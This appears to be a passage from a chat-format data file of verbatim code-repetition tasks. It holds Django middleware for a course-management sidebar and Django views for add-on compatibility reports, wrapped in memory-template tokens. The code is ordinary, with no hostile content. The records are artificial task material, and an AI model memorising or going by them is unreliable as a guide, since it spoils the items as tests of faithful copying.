1][1]\n ] = kwargs['pk']\n return model_ids\n\n def _get_objects(self, model_ids):\n '''\n Yields pairs of name, object.\n Name is translated according with mapping.\n :param model_ids: dict returned from _get_model_ids\n :return:\n '''\n for model, pk in list(model_ids.items()):\n filter_data = {'id': pk}\n if self.request.user.is_authenticated:\n filter_data.update(get_model_filter(model, {}))\n yield (MODEL_NAMES_MAPPING[model], model.objects.filter(**filter_data).first())\n\n def _reverse(self, name, kwargs=None):\n namespace = getattr(settings, 'CTMS_URL_NAMESPACE', 'ctms')\n return reverse('{}:{}'.format(namespace, name), kwargs=kwargs)\n\n def _get_url_kwargs(self, url):\n kwarg_re = r'\\(\\?\\P\\<(\\w+)>+?'\n kwargs = re.findall(kwarg_re, url.regex.pattern)\n return kwargs\n\n def _get_urls(self, request):\n \"\"\"\n retur: dict with urls like\n {\n 'all_urls': {\n 'url_name': '/some/url'\n },\n 'course_urls':{\n '1':{\n 'url.name': '/some/url'\n }\n },\n 'courslet_urls':\n '1':{\n 'url.name': '/some/url'\n }\n },\n 'unit_urls':\n '1':{\n 'url.name': '/some/url'\n }\n },\n 'response_urls':\n '1':{\n 'url.name': '/some/url'\n }\n }\n }\n \"\"\"\n all_urls = {}\n def add_url(to, url_name, obj_id, url):\n all_urls.setdefault(\n to, {}\n ).setdefault(\n obj_id, {}\n )[url_name] = url\n\n for url in ctms_urls:\n url_kw = self._get_url_kwargs(url)\n try:\n kwargs = self._translate_kwargs(request, url_kw)\n _url = self._reverse(url.name, kwargs)\n # course_pk = kwargs.get('course_pk')\n # courselet_pk = kwargs.get('courselet_pk')\n if 'course' in url.name:\n pk = kwargs.get('pk')\n add_url('course_urls', url.name, pk, _url)\n elif 'courslet' in url.name:\n pk = kwargs.get('pk')\n add_url('courslet_urls', url.name, pk, _url)\n elif 'unit' in url.name:\n pk = kwargs.get('pk')\n add_url('unit_urls', url.name, pk, _url)\n elif 'response' in url.name:\n pk = kwargs.get('pk')\n add_url('unit_urls', url.name, pk, _url)\n all_urls.setdefault('all_urls', {})[url.name] = _url\n except NoReverseMatch:\n continue\n return all_urls\n\n def _get_model_from_request(self, request, name):\n return getattr(getattr(request, MODEL_NAMES_MAPPING[name], None), 'id', None)\n\n def _translate_kwargs(self, request, kwargs_list):\n last_pk = None\n _, default_model = list(MODELS_ORDERED_DICT.items())[0]\n result_kwargs = {}\n\n for kw, model in list(MODELS_ORDERED_DICT.items()):\n if kw in kwargs_list:\n result_kwargs[kw] = self._get_model_from_request(request, model)\n last_pk = kw\n if 'pk' in kwargs_list:\n if last_pk is None:\n result_kwargs['pk'] = self._get_model_from_request(request, default_model)\n else:\n next_model = list(MODELS_ORDERED_DICT.items())[list(MODELS_ORDERED_DICT.keys()).index(last_pk) + 1]\n result_kwargs['pk'] = self._get_model_from_request(request, next_model[1])\n return result_kwargs\n\n\nclass SideBarMiddleware(SideBarUtils):\n def process_view(self, request, view_func, view_args, view_kwargs):\n # urls = self._get_urls(request)\n self.request = request\n current_url = resolve(request.path_info).url_name\n if 'bp' not in request.path and request.path.startswith('/ctms/') and reverse('accounts:profile_update') != request.path and \\\n request.path != reverse('ctms:email_sent') and '/ctms/invites/' not in request.path:\n # if we are going to /ctms/ namespace except of /ctms/email_sent/\n if (request.user.is_authenticated and (not getattr(request.user, 'instructor', None)\n or not request.user.instructor.institution or not request.user.instructor.what_do_you_teach)):\n # if we don't have instructor or instructor.institution\n return HttpResponseRedirect('{}?next={}'.format(reverse('accounts:profile_update'), request.path))\n if 'ctms' in request.path and current_url != 'my_courses':\n model_ids = self._get_model_ids(view_kwargs)\n objects = self._get_objects(model_ids)\n # attach recieved objects to request object\n for name, obj in objects:\n setattr(request, name, obj)\n\n # attach object id's to session\n old_obj_ids = request.session.get('sidebar_object_ids', {})\n obj_ids = {}\n for name, cls in list(NAME_MODEL_MAPPING.items()):\n old_id = old_obj_ids.get(cls.__name__)\n new_id = model_ids.get(cls)\n if old_id and new_id:\n if new_id != old_id:\n obj_ids[cls.__name__] = new_id\n else:\n obj_ids[cls.__name__] = new_id\n elif old_id and not new_id:\n obj_ids[cls.__name__] = old_id\n elif not old_id and new_id:\n obj_ids[cls.__name__] = new_id\n request.session['sidebar_object_ids'] = obj_ids\n return None\n\n def process_template_response(self, request, response):\n # add request to mixin\n current_url = resolve(request.path_info).url_name\n self.course_mixin.request = request\n sidebar_context = {}\n my_courses = self.course_mixin.get_my_courses() if request.user.is_authenticated else Course.objects.none()\n sidebar_context['user_courses'] = my_courses\n if 'ctms' in request.path and not request.session.get('sidebar_object_ids', {}):\n for model, name in list(MODEL_NAMES_MAPPING.items()):\n sidebar_context[name] = getattr(request, name, None)\n # urls = self._get_urls(request)\n # sidebar_context['urls'] = urls\n elif request.session.get('sidebar_object_ids'):\n objects = dict(self._get_objects({\n model: request.session.get('sidebar_object_ids', {}).get(name)\n for name, model in list(NAME_MODEL_MAPPING.items())\n }))\n sidebar_context.update(objects)\n\n if sidebar_context.get('course'):\n courslets = self.course_mixin.get_courselets_by_course(sidebar_context['course'])\n sidebar_context['course_courslets'] = courslets\n\n if sidebar_context.get('courslet'):\n sidebar_context['courslet_units'] = self.course_mixin.get_units_by_courselet(\n sidebar_context['courslet']\n )\n sidebar_context['current_page_name'] = current_url\n\n sidebar_context['courselets_link_active'] = False\n sidebar_context['units_link_active'] = False\n\n if current_url == 'course_view':\n sidebar_context['courselets_link_active'] = True\n elif current_url == 'courslet_view':\n sidebar_context['courselets_link_active'] = True\n sidebar_context['units_link_active'] = True\n\n if response.context_data:\n response.context_data['sidebar'] = sidebar_context\n response.render()\n\n return response\n```\nNo additions or omissions.",
"role": "user"
}
] |
[
{
"content": "Repeat the code precisely:\n<|memory_start|>```python\nimport re\nfrom collections import OrderedDict\nfrom django.urls import reverse, resolve, NoReverseMatch\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\n\nfrom ct.models import Course, CourseUnit, UnitLesson, Response\nfrom ctms.urls import urlpatterns as ctms_urls\nfrom .views import CourseCoursletUnitMixin\n\n# course, courslet, unit\nMODEL_ORDER_TUPLE = (('course_pk', Course),\n ('courselet_pk', CourseUnit),\n ('unit_pk', UnitLesson),\n ('response_pk', Response))\nMODELS_ORDERED_DICT = OrderedDict(MODEL_ORDER_TUPLE)\n\nMODEL_NAMES_MAPPING = {\n Course: 'course',\n CourseUnit: 'courslet',\n UnitLesson: 'unit',\n Response: 'response'\n}\n\nNAME_MODEL_MAPPING = {\n 'Course': Course,\n 'Response': Response,\n 'UnitLesson': UnitLesson,\n 'CourseUnit': CourseUnit\n}\n\nALLOWED_MODEL_FILTERS_MAPPING = {\n Course: [''],\n CourseUnit: ['']\n}\n\n\ndef get_model_filter(model, kwargs):\n \"\"\"\n Add filter params to appropriate model if any\n Arguments:\n model (object): Model object\n kwargs (dict): key, value to be added to the model filtering\n\n \"\"\"\n filter_dict = {}\n for field in ALLOWED_MODEL_FILTERS_MAPPING.get(model, []):\n if kwargs.get(field):\n filter_dict[field] = kwargs.get(field)\n return filter_dict\n\n\nclass SideBarUtils(object):\n '''\n Utils class.\n '''\n def __init__(self, get_response):\n # before using this mixin we have to attach request to mixin's instance\n self.course_mixin = CourseCoursletUnitMixin()\n self.get_response = get_response\n\n def __call__(self, request):\n # Code to be executed for each request before\n # the view (and later middleware) are called.\n\n response = self.get_response(request)\n\n # Code to be executed for each request/response after\n # the view is called.\n\n return response\n\n def _get_model_ids(self, kwargs):\n '''\n :param kwargs:\n :return:\n '''\n model_ids = dict()\n last_pk = None\n _, default_model = list(MODELS_ORDERED_DICT.items())[0]\n for kw, model in list(MODELS_ORDERED_DICT.items()):\n if kw in kwargs:\n last_pk = kw\n model_ids[MODELS_ORDERED_DICT[kw]] = kwargs[kw]\n if 'pk' in kwargs:\n if last_pk is None:\n model_ids[default_model] = kwargs['pk']\n else:\n model_ids[\n list(MODELS_ORDERED_DICT.items())[list(MODELS_ORDERED_DICT.keys()).index(last_pk) + 1][1]\n ] = kwargs['pk']\n return model_ids\n\n def _get_objects(self, model_ids):\n '''\n Yields pairs of name, object.\n Name is translated according with mapping.\n :param model_ids: dict returned from _get_model_ids\n :return:\n '''\n for model, pk in list(model_ids.items()):\n filter_data = {'id': pk}\n if self.request.user.is_authenticated:\n filter_data.update(get_model_filter(model, {}))\n yield (MODEL_NAMES_MAPPING[model], model.objects.filter(**filter_data).first())\n\n def _reverse(self, name, kwargs=None):\n namespace = getattr(settings, 'CTMS_URL_NAMESPACE', 'ctms')\n return reverse('{}:{}'.format(namespace, name), kwargs=kwargs)\n\n def _get_url_kwargs(self, url):\n kwarg_re = r'\\(\\?\\P\\<(\\w+)>+?'\n kwargs = re.findall(kwarg_re, url.regex.pattern)\n return kwargs\n\n def _get_urls(self, request):\n \"\"\"\n retur: dict with urls like\n {\n 'all_urls': {\n 'url_name': '/some/url'\n },\n 'course_urls':{\n '1':{\n 'url.name': '/some/url'\n }\n },\n 'courslet_urls':\n '1':{\n 'url.name': '/some/url'\n }\n },\n 'unit_urls':\n '1':{\n 'url.name': '/some/url'\n }\n },\n 'response_urls':\n '1':{\n 'url.name': '/some/url'\n }\n }\n }\n \"\"\"\n all_urls = {}\n def add_url(to, url_name, obj_id, url):\n all_urls.setdefault(\n to, {}\n ).setdefault(\n obj_id, {}\n )[url_name] = url\n\n for url in ctms_urls:\n url_kw = self._get_url_kwargs(url)\n try:\n kwargs = self._translate_kwargs(request, url_kw)\n _url = self._reverse(url.name, kwargs)\n # course_pk = kwargs.get('course_pk')\n # courselet_pk = kwargs.get('courselet_pk')\n if 'course' in url.name:\n pk = kwargs.get('pk')\n add_url('course_urls', url.name, pk, _url)\n elif 'courslet' in url.name:\n pk = kwargs.get('pk')\n add_url('courslet_urls', url.name, pk, _url)\n elif 'unit' in url.name:\n pk = kwargs.get('pk')\n add_url('unit_urls', url.name, pk, _url)\n elif 'response' in url.name:\n pk = kwargs.get('pk')\n add_url('unit_urls', url.name, pk, _url)\n all_urls.setdefault('all_urls', {})[url.name] = _url\n except NoReverseMatch:\n continue\n return all_urls\n\n def _get_model_from_request(self, request, name):\n return getattr(getattr(request, MODEL_NAMES_MAPPING[name], None), 'id', None)\n\n def _translate_kwargs(self, request, kwargs_list):\n last_pk = None\n _, default_model = list(MODELS_ORDERED_DICT.items())[0]\n result_kwargs = {}\n\n for kw, model in list(MODELS_ORDERED_DICT.items()):\n if kw in kwargs_list:\n result_kwargs[kw] = self._get_model_from_request(request, model)\n last_pk = kw\n if 'pk' in kwargs_list:\n if last_pk is None:\n result_kwargs['pk'] = self._get_model_from_request(request, default_model)\n else:\n next_model = list(MODELS_ORDERED_DICT.items())[list(MODELS_ORDERED_DICT.keys()).index(last_pk) + 1]\n result_kwargs['pk'] = self._get_model_from_request(request, next_model[1])\n return result_kwargs\n\n\nclass SideBarMiddleware(SideBarUtils):\n def process_view(self, request, view_func, view_args, view_kwargs):\n # urls = self._get_urls(request)\n self.request = request\n current_url = resolve(request.path_info).url_name\n if 'bp' not in request.path and request.path.startswith('/ctms/') and reverse('accounts:profile_update') != request.path and \\\n request.path != reverse('ctms:email_sent') and '/ctms/invites/' not in request.path:\n # if we are going to /ctms/ namespace except of /ctms/email_sent/\n if (request.user.is_authenticated and (not getattr(request.user, 'instructor', None)\n or not request.user.instructor.institution or not request.user.instructor.what_do_you_teach)):\n # if we don't have instructor or instructor.institution\n return HttpResponseRedirect('{}?next={}'.format(reverse('accounts:profile_update'), request.path))\n if 'ctms' in request.path and current_url != 'my_courses':\n model_ids = self._get_model_ids(view_kwargs)\n objects = self._get_objects(model_ids)\n # attach recieved objects to request object\n for name, obj in objects:\n setattr(request, name, obj)\n\n # attach object id's to session\n old_obj_ids = request.session.get('sidebar_object_ids', {})\n obj_ids = {}\n for name, cls in list(NAME_MODEL_MAPPING.items()):\n old_id = old_obj_ids.get(cls.__name__)\n new_id = model_ids.get(cls)\n if old_id and new_id:\n if new_id != old_id:\n obj_ids[cls.__name__] = new_id\n else:\n obj_ids[cls.__name__] = new_id\n elif old_id and not new_id:\n obj_ids[cls.__name__] = old_id\n elif not old_id and new_id:\n obj_ids[cls.__name__] = new_id\n request.session['sidebar_object_ids'] = obj_ids\n return None\n\n def process_template_response(self, request, response):\n # add request to mixin\n current_url = resolve(request.path_info).url_name\n self.course_mixin.request = request\n sidebar_context = {}\n my_courses = self.course_mixin.get_my_courses() if request.user.is_authenticated else Course.objects.none()\n sidebar_context['user_courses'] = my_courses\n if 'ctms' in request.path and not request.session.get('sidebar_object_ids', {}):\n for model, name in list(MODEL_NAMES_MAPPING.items()):\n sidebar_context[name] = getattr(request, name, None)\n # urls = self._get_urls(request)\n # sidebar_context['urls'] = urls\n elif request.session.get('sidebar_object_ids'):\n objects = dict(self._get_objects({\n model: request.session.get('sidebar_object_ids', {}).get(name)\n for name, model in list(NAME_MODEL_MAPPING.items())\n }))\n sidebar_context.update(objects)\n\n if sidebar_context.get('course'):\n courslets = self.course_mixin.get_courselets_by_course(sidebar_context['course'])\n sidebar_context['course_courslets'] = courslets\n\n if sidebar_context.get('courslet'):\n sidebar_context['courslet_units'] = self.course_mixin.get_units_by_courselet(\n sidebar_context['courslet']\n )\n sidebar_context['current_page_name'] = current_url\n\n sidebar_context['courselets_link_active'] = False\n sidebar_context['units_link_active'] = False\n\n if current_url == 'course_view':\n sidebar_context['courselets_link_active'] = True\n elif current_url == 'courslet_view':\n sidebar_context['courselets_link_active'] = True\n sidebar_context['units_link_active'] = True\n\n if response.context_data:\n response.context_data['sidebar'] = sidebar_context\n response.render()\n\n return response\n```<|memory_end|>\nNo additions or omissions.",
"role": "user"
}
] |
```python
import re
from collections import OrderedDict
from django.urls import reverse, resolve, NoReverseMatch
from django.conf import settings
from django.http import HttpResponseRedirect
from ct.models import Course, CourseUnit, UnitLesson, Response
from ctms.urls import urlpatterns as ctms_urls
from .views import CourseCoursletUnitMixin
# course, courslet, unit
MODEL_ORDER_TUPLE = (('course_pk', Course),
('courselet_pk', CourseUnit),
('unit_pk', UnitLesson),
('response_pk', Response))
MODELS_ORDERED_DICT = OrderedDict(MODEL_ORDER_TUPLE)
MODEL_NAMES_MAPPING = {
Course: 'course',
CourseUnit: 'courslet',
UnitLesson: 'unit',
Response: 'response'
}
NAME_MODEL_MAPPING = {
'Course': Course,
'Response': Response,
'UnitLesson': UnitLesson,
'CourseUnit': CourseUnit
}
ALLOWED_MODEL_FILTERS_MAPPING = {
Course: [''],
CourseUnit: ['']
}
def get_model_filter(model, kwargs):
"""
Add filter params to appropriate model if any
Arguments:
model (object): Model object
kwargs (dict): key, value to be added to the model filtering
"""
filter_dict = {}
for field in ALLOWED_MODEL_FILTERS_MAPPING.get(model, []):
if kwargs.get(field):
filter_dict[field] = kwargs.get(field)
return filter_dict
class SideBarUtils(object):
'''
Utils class.
'''
def __init__(self, get_response):
# before using this mixin we have to attach request to mixin's instance
self.course_mixin = CourseCoursletUnitMixin()
self.get_response = get_response
def __call__(self, request):
# Code to be executed for each request before
# the view (and later middleware) are called.
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
return response
def _get_model_ids(self, kwargs):
'''
:param kwargs:
:return:
'''
model_ids = dict()
last_pk = None
_, default_model = list(MODELS_ORDERED_DICT.items())[0]
for kw, model in list(MODELS_ORDERED_DICT.items()):
if kw in kwargs:
last_pk = kw
model_ids[MODELS_ORDERED_DICT[kw]] = kwargs[kw]
if 'pk' in kwargs:
if last_pk is None:
model_ids[default_model] = kwargs['pk']
else:
model_ids[
list(MODELS_ORDERED_DICT.items())[list(MODELS_ORDERED_DICT.keys()).index(last_pk) + 1][1]
] = kwargs['pk']
return model_ids
def _get_objects(self, model_ids):
'''
Yields pairs of name, object.
Name is translated according with mapping.
:param model_ids: dict returned from _get_model_ids
:return:
'''
for model, pk in list(model_ids.items()):
filter_data = {'id': pk}
if self.request.user.is_authenticated:
filter_data.update(get_model_filter(model, {}))
yield (MODEL_NAMES_MAPPING[model], model.objects.filter(**filter_data).first())
def _reverse(self, name, kwargs=None):
namespace = getattr(settings, 'CTMS_URL_NAMESPACE', 'ctms')
return reverse('{}:{}'.format(namespace, name), kwargs=kwargs)
def _get_url_kwargs(self, url):
kwarg_re = r'\(\?\P\<(\w+)>+?'
kwargs = re.findall(kwarg_re, url.regex.pattern)
return kwargs
def _get_urls(self, request):
"""
retur: dict with urls like
{
'all_urls': {
'url_name': '/some/url'
},
'course_urls':{
'1':{
'url.name': '/some/url'
}
},
'courslet_urls':
'1':{
'url.name': '/some/url'
}
},
'unit_urls':
'1':{
'url.name': '/some/url'
}
},
'response_urls':
'1':{
'url.name': '/some/url'
}
}
}
"""
all_urls = {}
def add_url(to, url_name, obj_id, url):
all_urls.setdefault(
to, {}
).setdefault(
obj_id, {}
)[url_name] = url
for url in ctms_urls:
url_kw = self._get_url_kwargs(url)
try:
kwargs = self._translate_kwargs(request, url_kw)
_url = self._reverse(url.name, kwargs)
# course_pk = kwargs.get('course_pk')
# courselet_pk = kwargs.get('courselet_pk')
if 'course' in url.name:
pk = kwargs.get('pk')
add_url('course_urls', url.name, pk, _url)
elif 'courslet' in url.name:
pk = kwargs.get('pk')
add_url('courslet_urls', url.name, pk, _url)
elif 'unit' in url.name:
pk = kwargs.get('pk')
add_url('unit_urls', url.name, pk, _url)
elif 'response' in url.name:
pk = kwargs.get('pk')
add_url('unit_urls', url.name, pk, _url)
all_urls.setdefault('all_urls', {})[url.name] = _url
except NoReverseMatch:
continue
return all_urls
def _get_model_from_request(self, request, name):
return getattr(getattr(request, MODEL_NAMES_MAPPING[name], None), 'id', None)
def _translate_kwargs(self, request, kwargs_list):
last_pk = None
_, default_model = list(MODELS_ORDERED_DICT.items())[0]
result_kwargs = {}
for kw, model in list(MODELS_ORDERED_DICT.items()):
if kw in kwargs_list:
result_kwargs[kw] = self._get_model_from_request(request, model)
last_pk = kw
if 'pk' in kwargs_list:
if last_pk is None:
result_kwargs['pk'] = self._get_model_from_request(request, default_model)
else:
next_model = list(MODELS_ORDERED_DICT.items())[list(MODELS_ORDERED_DICT.keys()).index(last_pk) + 1]
result_kwargs['pk'] = self._get_model_from_request(request, next_model[1])
return result_kwargs
class SideBarMiddleware(SideBarUtils):
def process_view(self, request, view_func, view_args, view_kwargs):
# urls = self._get_urls(request)
self.request = request
current_url = resolve(request.path_info).url_name
if 'bp' not in request.path and request.path.startswith('/ctms/') and reverse('accounts:profile_update') != request.path and \
request.path != reverse('ctms:email_sent') and '/ctms/invites/' not in request.path:
# if we are going to /ctms/ namespace except of /ctms/email_sent/
if (request.user.is_authenticated and (not getattr(request.user, 'instructor', None)
or not request.user.instructor.institution or not request.user.instructor.what_do_you_teach)):
# if we don't have instructor or instructor.institution
return HttpResponseRedirect('{}?next={}'.format(reverse('accounts:profile_update'), request.path))
if 'ctms' in request.path and current_url != 'my_courses':
model_ids = self._get_model_ids(view_kwargs)
objects = self._get_objects(model_ids)
# attach recieved objects to request object
for name, obj in objects:
setattr(request, name, obj)
# attach object id's to session
old_obj_ids = request.session.get('sidebar_object_ids', {})
obj_ids = {}
for name, cls in list(NAME_MODEL_MAPPING.items()):
old_id = old_obj_ids.get(cls.__name__)
new_id = model_ids.get(cls)
if old_id and new_id:
if new_id != old_id:
obj_ids[cls.__name__] = new_id
else:
obj_ids[cls.__name__] = new_id
elif old_id and not new_id:
obj_ids[cls.__name__] = old_id
elif not old_id and new_id:
obj_ids[cls.__name__] = new_id
request.session['sidebar_object_ids'] = obj_ids
return None
def process_template_response(self, request, response):
# add request to mixin
current_url = resolve(request.path_info).url_name
self.course_mixin.request = request
sidebar_context = {}
my_courses = self.course_mixin.get_my_courses() if request.user.is_authenticated else Course.objects.none()
sidebar_context['user_courses'] = my_courses
if 'ctms' in request.path and not request.session.get('sidebar_object_ids', {}):
for model, name in list(MODEL_NAMES_MAPPING.items()):
sidebar_context[name] = getattr(request, name, None)
# urls = self._get_urls(request)
# sidebar_context['urls'] = urls
elif request.session.get('sidebar_object_ids'):
objects = dict(self._get_objects({
model: request.session.get('sidebar_object_ids', {}).get(name)
for name, model in list(NAME_MODEL_MAPPING.items())
}))
sidebar_context.update(objects)
if sidebar_context.get('course'):
courslets = self.course_mixin.get_courselets_by_course(sidebar_context['course'])
sidebar_context['course_courslets'] = courslets
if sidebar_context.get('courslet'):
sidebar_context['courslet_units'] = self.course_mixin.get_units_by_courselet(
sidebar_context['courslet']
)
sidebar_context['current_page_name'] = current_url
sidebar_context['courselets_link_active'] = False
sidebar_context['units_link_active'] = False
if current_url == 'course_view':
sidebar_context['courselets_link_active'] = True
elif current_url == 'courslet_view':
sidebar_context['courselets_link_active'] = True
sidebar_context['units_link_active'] = True
if response.context_data:
response.context_data['sidebar'] = sidebar_context
response.render()
return response
```
|
[
{
"content": "```python\nimport json\nimport re\n\nfrom django import http\nfrom django.db.models import Count\nfrom django.shortcuts import redirect, render\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom tower import ugettext as _\n\nimport amo\nimport amo.utils\nfrom addons.decorators import owner_or_unlisted_reviewer\nfrom amo.decorators import post_required\nfrom amo.utils import urlparams\nfrom amo.urlresolvers import reverse\nfrom addons.models import Addon\nfrom search.utils import floor_version\nfrom versions.compare import version_dict as vdict, version_int as vint\nfrom .models import CompatReport, AppCompat, CompatTotals\nfrom .forms import AppVerForm, CompatForm\n\n\ndef index(request, version=None):\n template = 'compat/index.html'\n COMPAT = [v for v in amo.COMPAT if v['app'] == request.APP.id]\n compat_dict = dict((v['main'], v) for v in COMPAT)\n if not COMPAT:\n return render(request, template, {'results': False})\n if version not in compat_dict:\n return http.HttpResponseRedirect(reverse('compat.index',\n args=[COMPAT[0]['main']]))\n qs = AppCompat.search()\n binary = None\n\n initial = {'appver': '%s-%s' % (request.APP.id, version), 'type': 'all'}\n initial.update(request.GET.items())\n form = CompatForm(initial)\n if request.GET and form.is_valid():\n if form.cleaned_data['appver']:\n app, ver = form.cleaned_data['appver'].split('-')\n if int(app) != request.APP.id or ver != version:\n new = reverse('compat.index', args=[ver], add_prefix=False)\n url = '/%s%s' % (amo.APP_IDS[int(app)].short, new)\n type_ = form.cleaned_data['type'] or None\n return http.HttpResponseRedirect(urlparams(url, type=type_))\n\n if form.cleaned_data['type'] != 'all':\n binary = form.cleaned_data['type'] == 'binary'\n\n compat, app = compat_dict[version], str(request.APP.id)\n compat_queries = (\n ('prev', qs.query(**{\n 'top_95.%s.%s' % (app, vint(compat['previous'])): True,\n 'support.%s.max__gte' % app: vint(compat['previous'])})),\n ('top_95', qs.query(**{'top_95_all.%s' % app: True})),\n ('all', qs),\n )\n compat_levels = [(key, version_compat(queryset, compat, app, binary))\n for key, queryset in compat_queries]\n usage_addons, usage_total = usage_stats(request, compat, app, binary)\n return render(request, template,\n {'version': version, 'usage_addons': usage_addons,\n 'usage_total': usage_total, 'compat_levels': compat_levels,\n 'form': form, 'results': True,\n 'show_previous': request.GET.get('previous')})\n\n\ndef version_compat(qs, compat, app, binary):\n facets = []\n for v, prev in zip(compat['versions'], (None,) + compat['versions']):\n d = {'from': vint(v)}\n if prev:\n d['to'] = vint(prev)\n facets.append(d)\n # Pick up everything else for an Other count.\n facets.append({'to': vint(compat['versions'][-1])})\n facet = {'range': {'support.%s.max' % app: facets}}\n if binary is not None:\n qs = qs.query(binary=binary)\n qs = qs.facet(by_status=facet)\n result = qs[:0].raw()\n total_addons = result['hits']['total']\n ranges = result['facets']['by_status']['ranges']\n titles = compat['versions'] + (_('Other'),)\n faceted = [(v, r['count']) for v, r in zip(titles, ranges)]\n return total_addons, faceted\n\n\ndef usage_stats(request, compat, app, binary=None):\n # Get the list of add-ons for usage stats.\n qs = AppCompat.search().order_by('-usage.%s' % app).values_dict()\n if request.GET.get('previous'):\n qs = qs.filter(**{\n 'support.%s.max__gte' % app: vint(compat['previous'])})\n else:\n qs = qs.filter(**{'support.%s.max__gte' % app: 0})\n if binary is not None:\n qs = qs.filter(binary=binary)\n addons = amo.utils.paginate(request, qs)\n for obj in addons.object_list:\n obj['usage'] = obj['usage'][app]\n obj['max_version'] = obj['max_version'][app]\n return addons, CompatTotals.objects.get(app=app).total\n\n\n@csrf_exempt\n@post_required\ndef incoming(request):\n # Turn camelCase into snake_case.\n def snake_case(s):\n return re.sub('[A-Z]+', '_\\g<0>', s).lower()\n\n try:\n data = [(snake_case(k), v)\n for k, v in json.loads(request.body).items()]\n except Exception:\n return http.HttpResponseBadRequest()\n\n # Build up a new report.\n report = CompatReport(client_ip=request.META.get('REMOTE_ADDR', ''))\n fields = CompatReport._meta.get_all_field_names()\n for key, value in data:\n if key in fields:\n setattr(report, key, value)\n else:\n return http.HttpResponseBadRequest()\n\n report.save()\n return http.HttpResponse(status=204)\n\n\ndef reporter(request):\n query = request.GET.get('guid')\n if query:\n qs = None\n if query.isdigit():\n qs = Addon.with_unlisted.filter(id=query)\n if not qs:\n qs = Addon.with_unlisted.filter(slug=query)\n if not qs:\n qs = Addon.with_unlisted.filter(guid=query)\n if not qs and len(query) > 4:\n qs = CompatReport.objects.filter(guid__startswith=query)\n if qs:\n guid = qs[0].guid\n addon = Addon.with_unlisted.get(guid=guid)\n if addon.is_listed or owner_or_unlisted_reviewer(request, addon):\n return redirect('compat.reporter_detail', guid)\n addons = (Addon.with_unlisted.filter(authors=request.user)\n if request.user.is_authenticated() else [])\n return render(request, 'compat/reporter.html',\n dict(query=query, addons=addons))\n\n\ndef reporter_detail(request, guid):\n try:\n addon = Addon.with_unlisted.get(guid=guid)\n except Addon.DoesNotExist:\n addon = None\n name = addon.name if addon else guid\n qs = CompatReport.objects.filter(guid=guid)\n\n if (addon and not addon.is_listed and\n not owner_or_unlisted_reviewer(request, addon)):\n # Not authorized? Let's pretend this addon simply doesn't exist.\n name = guid\n qs = CompatReport.objects.none()\n\n form = AppVerForm(request.GET)\n if request.GET and form.is_valid() and form.cleaned_data['appver']:\n # Apply filters only if we have a good app/version combination.\n app, ver = form.cleaned_data['appver'].split('-')\n app = amo.APP_IDS[int(app)]\n ver = vdict(floor_version(ver))['major'] # 3.6 => 3\n\n # Ideally we'd have a `version_int` column to do strict version\n # comparing, but that's overkill for basic version filtering here.\n qs = qs.filter(app_guid=app.guid,\n app_version__startswith=str(ver) + '.')\n\n works_ = dict(qs.values_list('works_properly').annotate(Count('id')))\n works = {'success': works_.get(True, 0), 'failure': works_.get(False, 0)}\n\n works_properly = request.GET.get('works_properly')\n if works_properly:\n qs = qs.filter(works_properly=works_properly)\n reports = amo.utils.paginate(request, qs.order_by('-created'), 100)\n\n return render(request, 'compat/reporter_detail.html',\n dict(reports=reports, works=works,\n works_properly=works_properly,\n name=name, guid=guid, form=form))\n```\nReconstruct the code word-for-word and space-for-space.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nimport json\nimport re\n\nfrom django import http\nfrom django.db.models import Count\nfrom django.shortcuts import redirect, render\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom tower import ugettext as _\n\nimport amo\nimport amo.utils\nfrom addons.decorators import owner_or_unlisted_reviewer\nfrom amo.decorators import post_required\nfrom amo.utils import urlparams\nfrom amo.urlresolvers import reverse\nfrom addons.models import Addon\nfrom search.utils import floor_version\nfrom versions.compare import version_dict as vdict, version_int as vint\nfrom .models import CompatReport, AppCompat, CompatTotals\nfrom .forms import AppVerForm, CompatForm\n\n\ndef index(request, version=None):\n template = 'compat/index.html'\n COMPAT = [v for v in amo.COMPAT if v['app'] == request.APP.id]\n compat_dict = dict((v['main'], v) for v in COMPAT)\n if not COMPAT:\n return render(request, template, {'results': False})\n if version not in compat_dict:\n return http.HttpResponseRedirect(reverse('compat.index',\n args=[COMPAT[0]['main']]))\n qs = AppCompat.search()\n binary = None\n\n initial = {'appver': '%s-%s' % (request.APP.id, version), 'type': 'all'}\n initial.update(request.GET.items())\n form = CompatForm(initial)\n if request.GET and form.is_valid():\n if form.cleaned_data['appver']:\n app, ver = form.cleaned_data['appver'].split('-')\n if int(app) != request.APP.id or ver != version:\n new = reverse('compat.index', args=[ver], add_prefix=False)\n url = '/%s%s' % (amo.APP_IDS[int(app)].short, new)\n type_ = form.cleaned_data['type'] or None\n return http.HttpResponseRedirect(urlparams(url, type=type_))\n\n if form.cleaned_data['type'] != 'all':\n binary = form.cleaned_data['type'] == 'binary'\n\n compat, app = compat_dict[version], str(request.APP.id)\n compat_queries = (\n ('prev', qs.query(**{\n 'top_95.%s.%s' % (app, vint(compat['previous'])): True,\n 'support.%s.max__gte' % app: vint(compat['previous'])})),\n ('top_95', qs.query(**{'top_95_all.%s' % app: True})),\n ('all', qs),\n )\n compat_levels = [(key, version_compat(queryset, compat, app, binary))\n for key, queryset in compat_queries]\n usage_addons, usage_total = usage_stats(request, compat, app, binary)\n return render(request, template,\n {'version': version, 'usage_addons': usage_addons,\n 'usage_total': usage_total, 'compat_levels': compat_levels,\n 'form': form, 'results': True,\n 'show_previous': request.GET.get('previous')})\n\n\ndef version_compat(qs, compat, app, binary):\n facets = []\n for v, prev in zip(compat['versions'], (None,) + compat['versions']):\n d = {'from': vint(v)}\n if prev:\n d['to'] = vint(prev)\n facets.append(d)\n # Pick up everything else for an Other count.\n facets.append({'to': vint(compat['versions'][-1])})\n facet = {'range': {'support.%s.max' % app: facets}}\n if binary is not None:\n qs = qs.query(binary=binary)\n qs = qs.facet(by_status=facet)\n result = qs[:0].raw()\n total_addons = result['hits']['total']\n ranges = result['facets']['by_status']['ranges']\n titles = compat['versions'] + (_('Other'),)\n faceted = [(v, r['count']) for v, r in zip(titles, ranges)]\n return total_addons, faceted\n\n\ndef usage_stats(request, compat, app, binary=None):\n # Get the list of add-ons for usage stats.\n qs = AppCompat.search().order_by('-usage.%s' % app).values_dict()\n if 